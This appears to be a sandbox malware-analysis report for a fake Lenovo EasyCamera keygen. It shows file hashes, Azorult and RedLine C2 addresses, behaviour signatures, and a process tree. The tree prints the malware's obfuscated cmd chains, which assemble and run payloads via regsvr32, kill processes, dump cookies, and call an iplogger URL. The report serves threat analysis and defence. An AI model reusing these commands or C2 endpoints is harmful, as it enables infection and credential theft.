Overview

overview

10

Static

static

ﱞﱞﱞ�...ﱞﱞ

windows10_x64

10

ﱞﱞﱞ�...ﱞﱞ

windows7_x64

10

win102

windows10_x64

1

win104

windows10_x64

10

Analysis

  • max time kernel
    1775s
  • max time network
    1737s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    11-05-2021 23:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Lenovo.Easycamera.6.32.2018.05.key.generator.by.aaocg.exe

  • Size

    6.4MB

  • MD5

    cdeeb6da0244476be71ebf88fa76ecdc

  • SHA1

    f26b35c822187292bc1c31c2e61b2a714daa5334

  • SHA256

    634f7f210c081e0d54fb348a921db874126736503cf7cfcf2f605c484aa6635a

  • SHA512

    149487c0ddf5c847c1e5182a921bc9d527b4bfcb525de1a129bd10c25a8119e7de153eadc6fdb157e95999ae20557aabe872c1b6ae8a8fb1a25bfe25478d30e1

Score
10/10
azorultplugxredlineservlyladiscoveryinfostealerpersistencespywarestealertrojan

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

redline

Botnet

ServLyla

C2

87.251.71.193:20119

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

    trojaninfostealerazorult
  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

    trojanplugx
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Executes dropped EXE 18 IoCs
  • Loads dropped DLL 47 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 2 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 30 IoCs
  • Modifies registry class 10 IoCs
  • Modifies system certificate store 2 TTPs 11 IoCs
    evasionspywaretrojan
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:464
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of SetThreadContext
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:888
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:2836
    • C:\Users\Admin\AppData\Local\Temp\Lenovo.Easycamera.6.32.2018.05.key.generator.by.aaocg.exe
      "C:\Users\Admin\AppData\Local\Temp\Lenovo.Easycamera.6.32.2018.05.key.generator.by.aaocg.exe"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:1268
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
        2⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:608
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
          keygen-pr.exe -p83fsase3Ge
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1576
          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            PID:1332
            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
              C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
              5⤵
              • Executes dropped EXE
              PID:436
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
          keygen-step-3.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1584
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
            4⤵
              PID:1256
              • C:\Windows\SysWOW64\PING.EXE
                ping 1.1.1.1 -n 1 -w 3000
                5⤵
                • Runs ping.exe
                PID:1156
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
            keygen-step-5.exe
            3⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:804
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /Q /C tYpE "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" > ..\FDhpFB.exe &&STARt ..\FDhpFB.exe -PpTHlybeBhi_Z2JPlcy& If "" == "" for %E in ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill -IM "%~NXE" /f > NuL
              4⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1696
              • C:\Users\Admin\AppData\Local\Temp\FDhpFB.exe
                ..\FDhpFB.exe -PpTHlybeBhi_Z2JPlcy
                5⤵
                • Executes dropped EXE
                PID:1376
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /Q /C tYpE "C:\Users\Admin\AppData\Local\Temp\FDhpFB.exe" > ..\FDhpFB.exe &&STARt ..\FDhpFB.exe -PpTHlybeBhi_Z2JPlcy& If "-PpTHlybeBhi_Z2JPlcy" == "" for %E in ( "C:\Users\Admin\AppData\Local\Temp\FDhpFB.exe" ) do taskkill -IM "%~NXE" /f > NuL
                  6⤵
                    PID:1872
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c eCHO | SET /p = "MZ" > 30EY.gg & COpY /b /y 30EY.gg +Q_FM.YU +H_WJ2.E3 + PJ76k1.o + SZaA.2a0+ 8Td1LZ.82Q + DMgIJ5IH.JC+ 4_xVhVZw.W + hWLEB3.E + BHn249Hz.35 + TRYY00W9.RM+ QBCT.xsG + 2SOkTK.Jx + Y1ws.9T8 + 9Q5AeJ.L + 7VrCZVK.U ..\IZ1SIMY.QE > nUl & sTART regsvr32 ..\iZ1SIMY.qE -u -S & DEl /Q * > Nul
                    6⤵
                      PID:1352
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                        7⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1256
                      • C:\Windows\SysWOW64\regsvr32.exe
                        regsvr32 ..\iZ1SIMY.qE -u -S
                        7⤵
                        • Loads dropped DLL
                        • Suspicious use of NtCreateThreadExHideFromDebugger
                        PID:2132
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" SET /p = "MZ" 1>30EY.gg"
                        7⤵
                          PID:1384
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill -IM "keygen-step-5.exe" /f
                      5⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1684
                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                  keygen-step-1.exe
                  3⤵
                  • Executes dropped EXE
                  PID:800
                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                  keygen-step-4.exe
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:320
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX3\Installer.exe
                    "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Installer.exe"
                    4⤵
                    • Executes dropped EXE
                    • Modifies system certificate store
                    • Suspicious use of AdjustPrivilegeToken
                    PID:676
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /c taskkill /f /im chrome.exe
                      5⤵
                        PID:2308
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im chrome.exe
                          6⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2336
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX3\jg6_6asg.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX3\jg6_6asg.exe"
                      4⤵
                      • Executes dropped EXE
                      • Modifies system certificate store
                      PID:2388
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX3\zhangxia.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX3\zhangxia.exe"
                      4⤵
                      • Executes dropped EXE
                      PID:2716
                      • C:\Windows\SysWOW64\rUNdlL32.eXe
                        "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                        5⤵
                        • Loads dropped DLL
                        • Modifies registry class
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2792
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2812
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe
                        C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe
                        5⤵
                        • Executes dropped EXE
                        • Modifies system certificate store
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3000
                        • C:\Program Files\Internet Explorer\iexplore.exe
                          "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1S5Ca7
                          6⤵
                          • Modifies Internet Explorer settings
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SetWindowsHookEx
                          PID:1700
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1700 CREDAT:275457 /prefetch:2
                            7⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of SetWindowsHookEx
                            PID:2240
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX3\gcttt.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX3\gcttt.exe"
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Adds Run key to start application
                      • Modifies system certificate store
                      PID:2060
                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        5⤵
                        • Executes dropped EXE
                        PID:1252
                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        5⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2092
                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        5⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2568
                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        5⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2724

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • memory/436-119-0x0000000000400000-0x0000000000983000-memory.dmp

                Filesize

                5.5MB

                Download

              • memory/888-184-0x00000000008B0000-0x00000000008FB000-memory.dmp

                Filesize

                300KB

                Download

              • memory/888-185-0x0000000001340000-0x00000000013B0000-memory.dmp

                Filesize

                448KB

                Download

              • memory/1268-60-0x0000000075591000-0x0000000075593000-memory.dmp

                Filesize

                8KB

                Download

              • memory/1332-125-0x0000000002390000-0x000000000252C000-memory.dmp

                Filesize

                1.6MB

                Download

              • memory/2132-165-0x0000000000440000-0x00000000004E2000-memory.dmp

                Filesize

                648KB

                Download

              • memory/2132-153-0x0000000010000000-0x000000001018A000-memory.dmp

                Filesize

                1.5MB

                Download

              • memory/2132-166-0x0000000000650000-0x00000000006DF000-memory.dmp

                Filesize

                572KB

                Download

              • memory/2132-152-0x00000000021C0000-0x000000000234A000-memory.dmp

                Filesize

                1.5MB

                Download

              • memory/2388-164-0x0000000000400000-0x000000000056D000-memory.dmp

                Filesize

                1.4MB

                Download

              • memory/2792-182-0x00000000008F0000-0x00000000009F1000-memory.dmp

                Filesize

                1.0MB

                Download

              • memory/2792-183-0x00000000001D0000-0x000000000022C000-memory.dmp

                Filesize

                368KB

                Download

              • memory/2792-181-0x0000000010000000-0x0000000010002000-memory.dmp

                Filesize

                8KB

                Download

              • memory/2812-179-0x0000000001060000-0x0000000001061000-memory.dmp

                Filesize

                4KB

                Download

              • memory/2812-188-0x0000000007280000-0x0000000007281000-memory.dmp

                Filesize

                4KB

                Download

              • memory/2812-190-0x00000000007B0000-0x00000000007CC000-memory.dmp

                Filesize

                112KB

                Download

              • memory/2836-189-0x0000000002CF0000-0x0000000002DF5000-memory.dmp

                Filesize

                1.0MB

                Download

              • memory/2836-187-0x0000000000490000-0x0000000000500000-memory.dmp

                Filesize

                448KB

                Download

              • memory/3000-200-0x0000000000590000-0x0000000000591000-memory.dmp

                Filesize

                4KB

                Download

              • memory/3000-194-0x0000000000400000-0x000000000041C000-memory.dmp

                Filesize

                112KB

                Download

              • memory/3000-191-0x0000000000400000-0x000000000041C000-memory.dmp

                Filesize

                112KB

                Download